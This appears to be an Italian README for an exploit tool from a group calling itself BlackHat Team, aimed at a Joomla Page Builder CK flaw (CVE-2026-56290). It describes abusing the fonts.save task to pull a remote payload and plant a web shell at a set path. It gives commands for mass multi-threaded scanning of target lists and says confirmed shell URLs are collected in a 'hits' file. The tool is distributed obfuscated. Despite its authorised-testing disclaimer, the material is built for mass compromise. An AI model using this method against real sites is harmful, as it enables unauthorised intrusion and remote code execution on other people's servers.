
Page Builder CK per Joomla - SSRF non autenticato / Scrittura remota di file che porta all'esecuzione di PHP Exploiter
BlackHat Team scanner proof-of-concept per la vulnerabilità fonts.save di Joomla Page Builder CK.
POC CVE-2026-56290
Autore: @mrzblackhat
Team: BlackHat Team
Crediti: Peyman Siyahi · MR.PERSIA
Questo strumento sonda i siti Joomla che eseguono il componente vulnerabile com_pagebuilderck. Abusa del task fonts.save per prelevare un payload remoto e scrive una web shell in:
media/com_pagebuilderck/gfonts/fbi.php
La RCE è confermata quando la shell caricata risponde con un <title> HTML contenente Fbi Shell.
Supporta scansioni singolo target e massive con worker multi-thread e salvataggio immediato dei successi.
requestsurllib3pip install requests urllib3
python3 poc.py --url https://example.com --insecure
python3 poc.py --mass targets.txt --insecure --threads 20 --timeout 12
targets.txt — un URL per riga. Le righe dopo # vengono ignorate.
Fbi ShellGli URL delle shell confermate vengono immediatamente aggiunti al file di output.
| File | Descrizione |
|---|---|
poc.py | Build rilasciata offuscata (esegui questo) |
hits.txt | Output predefinito per shell confermate |
python3 _build_obf.py
POST a index.php con option=com_pagebuilderck&task=fonts.savefont.css attiva la scrittura della shell in gfonts/fbi.phpGET sul percorso della shell e verifica che <title> contenga Fbi ShellQuesto strumento è fornito esclusivamente per ricerca sulla sicurezza autorizzata e test di penetrazione.
L'accesso non autorizzato a sistemi informatici è illegale. Gli autori e BlackHat Team non sono responsabili per un uso improprio. Testa solo sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta.
@mrzblackhatBlackHat Team — Peyman Siyahi · MR.PERSIA
Ricerca e strumenti originali di @mrzblackhat. Non redistribuire copie modificate senza attribuzione.
| Flag | Descrizione |
|---|
--url URL | Scansiona un singolo target |
--mass FILE | Scansiona target da un file |
--insecure | Salta la verifica del certificato TLS |
--threads N | Thread worker per modalità massiva (default: 20) |
--timeout N | Timeout HTTP in secondi (default: 12) |
--output FILE | Salva gli URL delle shell confermate (default: hits.txt) |